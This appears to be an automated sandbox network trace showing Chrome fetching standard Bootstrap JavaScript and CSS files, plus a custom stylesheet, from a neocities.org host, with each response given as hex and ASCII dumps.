                          2024-07-09 09:33:22 UTC1369INData Raw: 76 65 43 6c 61 73 73 28 43 29 7d 69 66 28 74 29 7b 69 66 28 69 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62
                          Data Ascii: veClass(C)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element.setAttrib
                          2024-07-09 09:33:22 UTC1369INData Raw: 22 2b 69 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 70 72 65 76 22 2c 79 3d 7b
                          Data Ascii: "+i,MOUSELEAVE:"mouseleave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item-prev",y={
                          2024-07-09 09:33:22 UTC1369INData Raw: 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64 28 79 2e 41 43 54 49 56 45 5f
                          Data Ascii: nterval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find(y.ACTIVE_
                          2024-07-09 09:33:22 UTC1369INData Raw: 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d 2c 43 2e 5f 67 65 74 49 74 65
                          Data Ascii: extarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)},C._getIte
                          2024-07-09 09:33:22 UTC1369INData Raw: 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 67
                          Data Ascii: relatedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).removeClass(g
                          2024-07-09 09:33:22 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73 65 22 2c 6e 3d 22 62 73 2e 63
                          Data Ascii: unction(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collapse",n="bs.c


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.749714198.51.233.24432708C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-07-09 09:33:22 UTC560OUTGET /bootstrap.min.css HTTP/1.1
                          Host: asfasfasfasp.neocities.org
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: text/css,*/*;q=0.1
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: style
                          Referer: https://jd-amber.vercel.app/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-07-09 09:33:22 UTC519INHTTP/1.1 200 OK
                          Date: Tue, 09 Jul 2024 09:33:22 GMT
                          Content-Type: text/css
                          Content-Length: 144877
                          Connection: close
                          Vary: Accept-Encoding
                          Last-Modified: Wed, 22 Sep 2021 08:30:42 GMT
                          ETag: "614ae9b2-235ed"
                          Server: neocities
                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                          Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: *
                          X-Neocities-CDN: cdn-ewr-2
                          Upgrade-Insecure-Requests: 1
                          X-Cached: HIT
                          Accept-Ranges: bytes
                          2024-07-09 09:33:22 UTC15865INData Raw: 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30 66 32 3b 2d 2d 70
                          Data Ascii: /*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */:root{--blue:#007bff;--indigo:#6610f2;--p
                          2024-07-09 09:33:22 UTC16384INData Raw: 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 7d 2e 63 6f 6c 2d 6c 67 2d 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 38 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 38 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 6c 67 2d 32 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 36 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 31 36 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 36 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 6c 67 2d 33 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 32 35 25 3b 66 6c 65 78 3a 30 20
                          Data Ascii: o;max-width:none}.col-lg-1{-webkit-box-flex:0;-ms-flex:0 0 8.333333%;flex:0 0 8.333333%;max-width:8.333333%}.col-lg-2{-webkit-box-flex:0;-ms-flex:0 0 16.666667%;flex:0 0 16.666667%;max-width:16.666667%}.col-lg-3{-webkit-box-flex:0;-ms-flex:0 0 25%;flex:0
                          2024-07-09 09:33:22 UTC16384INData Raw: 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 31 70 78 20 23 66 66 66 2c 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 34 30 2c 31 36 37 2c 36 39 2c 2e 32 35 29 7d 2e 63 75 73 74 6f 6d 2d 66 69 6c 65 2d 69 6e 70 75 74 2e 69 73 2d 76 61 6c 69 64 7e 2e 63 75 73 74 6f 6d 2d 66 69 6c 65 2d 6c 61 62 65 6c 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73 74 6f 6d 2d 66 69 6c 65 2d 69 6e 70 75 74 3a 76 61 6c 69 64 7e 2e 63 75 73 74 6f 6d 2d 66 69 6c 65 2d 6c 61 62 65 6c 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 38 61 37 34 35 7d 2e 63 75 73 74 6f 6d 2d 66 69 6c 65 2d 69 6e 70 75 74 2e 69 73 2d 76 61 6c 69 64 7e 2e 63 75 73 74 6f 6d 2d 66 69 6c 65 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e
                          Data Ascii: ox-shadow:0 0 0 1px #fff,0 0 0 .2rem rgba(40,167,69,.25)}.custom-file-input.is-valid~.custom-file-label,.was-validated .custom-file-input:valid~.custom-file-label{border-color:#28a745}.custom-file-input.is-valid~.custom-file-label::before,.was-validated .
                          2024-07-09 09:33:22 UTC16384INData Raw: 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 63 33 35 34 35 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 63 33 35 34 35 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67 65 72 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67 65 72 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 2e 73 68 6f 77 3e 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67 65 72 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 3a 66 6f 63 75 73 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 32 32 30 2c 35
                          Data Ascii: f;background-color:#dc3545;border-color:#dc3545}.btn-outline-danger:not(:disabled):not(.disabled).active:focus,.btn-outline-danger:not(:disabled):not(.disabled):active:focus,.show>.btn-outline-danger.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(220,5
                          2024-07-09 09:33:22 UTC16384INData Raw: 65 64 34 64 61 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 7d 2e 63 75 73 74 6f 6d 2d 66 69 6c 65 2d 6c 61 62 65 6c 3a 3a 61 66 74 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 7a 2d 69 6e 64 65 78 3a 33 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 63 61 6c 63 28 32 2e 32 35 72 65 6d 20 2b 20 32 70 78 29 20 2d 20 31 70 78 20 2a 20 32 29 3b 70 61 64 64 69 6e 67 3a 2e 33 37 35 72 65 6d 20 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 63 6f 6c 6f 72 3a 23 34 39 35 30 35 37 3b 63 6f 6e 74 65 6e 74 3a 22 42 72 6f 77 73 65 22 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 39 65 63 65 66
                          Data Ascii: ed4da;border-radius:.25rem}.custom-file-label::after{position:absolute;top:0;right:0;bottom:0;z-index:3;display:block;height:calc(calc(2.25rem + 2px) - 1px * 2);padding:.375rem .75rem;line-height:1.5;color:#495057;content:"Browse";background-color:#e9ecef
                          2024-07-09 09:33:22 UTC16384INData Raw: 3a 66 6f 63 75 73 7b 7a 2d 69 6e 64 65 78 3a 32 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 30 2c 31 32 33 2c 32 35 35 2c 2e 32 35 29 7d 2e 70 61 67 65 2d 6c 69 6e 6b 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 70 61 67 65 2d 69 74 65 6d 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 2e 70 61 67 65 2d 6c 69 6e 6b 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 7d 2e 70 61 67 65 2d 69 74 65 6d 3a 6c 61 73 74 2d 63 68
                          Data Ascii: :focus{z-index:2;outline:0;box-shadow:0 0 0 .2rem rgba(0,123,255,.25)}.page-link:not(:disabled):not(.disabled){cursor:pointer}.page-item:first-child .page-link{margin-left:0;border-top-left-radius:.25rem;border-bottom-left-radius:.25rem}.page-item:last-ch
                          2024-07-09 09:33:22 UTC16384INData Raw: 70 78 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 61 75 74 6f 5b 78 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 62 6f 74 74 6f 6d 5d 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 62 6f 74 74 6f 6d 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 72 65 6d 7d 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 61 75 74 6f 5b 78 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 62 6f 74 74 6f 6d 5d 20 2e 61 72 72 6f 77 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 62 6f 74 74 6f 6d 20 2e 61 72 72 6f 77 7b 74 6f 70 3a 63 61 6c 63 28 28 2e 35 72 65 6d 20 2b 20 31 70 78 29 20 2a 20 2d 31 29 7d 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 61 75 74 6f 5b 78 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 62 6f 74 74 6f 6d 5d 20 2e 61 72 72 6f 77 3a 3a 61 66 74 65 72 2c 2e 62
                          Data Ascii: px;border-right-color:#fff}.bs-popover-auto[x-placement^=bottom],.bs-popover-bottom{margin-top:.5rem}.bs-popover-auto[x-placement^=bottom] .arrow,.bs-popover-bottom .arrow{top:calc((.5rem + 1px) * -1)}.bs-popover-auto[x-placement^=bottom] .arrow::after,.b
                          2024-07-09 09:33:22 UTC16384INData Raw: 73 74 61 72 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 73 6d 2d 65 6e 64 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 73 6d 2d 63 65 6e 74 65 72 7b 2d 77 65 62
                          Data Ascii: start{-webkit-box-pack:start!important;-ms-flex-pack:start!important;justify-content:flex-start!important}.justify-content-sm-end{-webkit-box-pack:end!important;-ms-flex-pack:end!important;justify-content:flex-end!important}.justify-content-sm-center{-web
                          2024-07-09 09:33:22 UTC14324INData Raw: 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 62 2d 73 6d 2d 30 2c 2e 6d 79 2d 73 6d 2d 30 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 6c 2d 73 6d 2d 30 2c 2e 6d 78 2d 73 6d 2d 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 2d 73 6d 2d 31 7b 6d 61 72 67 69 6e 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 73 6d 2d 31 2c 2e 6d 79 2d 73 6d 2d 31 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 72 2d 73 6d 2d 31 2c 2e 6d 78 2d 73 6d 2d 31 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 62 2d 73 6d 2d 31 2c 2e 6d 79 2d 73 6d 2d 31
                          Data Ascii: {margin-right:0!important}.mb-sm-0,.my-sm-0{margin-bottom:0!important}.ml-sm-0,.mx-sm-0{margin-left:0!important}.m-sm-1{margin:.25rem!important}.mt-sm-1,.my-sm-1{margin-top:.25rem!important}.mr-sm-1,.mx-sm-1{margin-right:.25rem!important}.mb-sm-1,.my-sm-1


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.749713198.51.233.24432708C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-07-09 09:33:22 UTC555OUTGET /dh-style.css HTTP/1.1
                          Host: asfasfasfasp.neocities.org
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: text/css,*/*;q=0.1
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: style
                          Referer: https://jd-amber.vercel.app/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-07-09 09:33:23 UTC519INHTTP/1.1 200 OK
                          Date: Tue, 09 Jul 2024 09:33:23 GMT
                          Content-Type: text/css
                          Content-Length: 320200
                          Connection: close
                          Vary: Accept-Encoding
                          Last-Modified: Wed, 22 Sep 2021 08:32:55 GMT
                          ETag: "614aea37-4e2c8"
                          Server: neocities
                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                          Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: *
                          X-Neocities-CDN: cdn-ewr-1
                          Upgrade-Insecure-Requests: 1
                          X-Cached: HIT
                          Accept-Ranges: bytes
                          2024-07-09 09:33:23 UTC15865INData Raw: 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 20 20 20 20 6c 69 73 74 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 0a 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 7d 0a 0a 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 7d 0a 0a 75 6c 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 0a 61 3a 68 6f 76 65 72 2c 0a 61
                          Data Ascii: * { margin: 0px; padding: 0px; list-style: none;}img { max-width: 100%;}a { text-decoration: none; outline: none; color: #444;}a:hover { color: #444;}ul { margin-bottom: 0; padding-left: 0;}a:hover,a
                          2024-07-09 09:33:23 UTC16384INData Raw: 52 71 34 52 37 7a 58 4c 50 63 4a 50 34 54 4e 74 38 6c 4c 38 58 61 32 71 53 53 4a 2b 7a 34 76 51 74 51 2f 6f 35 63 43 77 6b 46 31 4e 55 79 59 2f 65 6e 4b 78 6c 34 72 31 37 39 35 4c 35 44 57 44 45 76 64 4c 38 48 59 52 77 46 42 6a 2b 78 32 79 66 66 6c 63 66 7a 57 45 76 45 6e 45 4a 66 34 6e 37 49 72 79 73 66 39 4a 6f 51 39 6b 50 41 30 48 71 38 4f 30 4a 2b 38 30 75 2b 61 77 6c 78 33 58 79 33 79 73 66 4a 44 2b 6b 75 52 39 6d 2f 42 38 58 71 38 50 57 30 66 38 41 67 4e 57 4c 34 74 72 48 76 6c 66 31 48 53 37 49 74 52 63 46 38 4d 77 66 73 37 4a 62 32 2b 79 6e 62 2f 4a 5a 76 69 47 6f 6c 76 6b 66 31 4b 2b 52 62 69 73 4e 6d 67 2f 5a 57 32 6b 5a 39 32 46 6f 2f 4a 5a 50 55 35 4a 62 7a 66 31 43 32 57 6d 55 74 4a 48 36 6c 50 47 33 32 4e 41 57 62 6e 65 37 59 58 49 65 42 45
                          Data Ascii: Rq4R7zXLPcJP4TNt8lL8Xa2qSSJ+z4vQtQ/o5cCwkF1NUyY/enKxl4r1795L5DWDEvdL8HYRwFBj+x2yfflcfzWEvEnEJf4n7Irysf9JoQ9kPA0Hq8O0J+80u+awlx3Xy3ysfJD+kuR9m/B8Xq8PW0f8AgNWL4trHvlf1HS7ItRcF8Mwfs7Jb2+ynb/JZviGolvkf1K+RbisNmg/ZW2kZ92Fo/JZPU5Jbzf1C2WmUtJH6lPG32NAWbne7YXIeBE
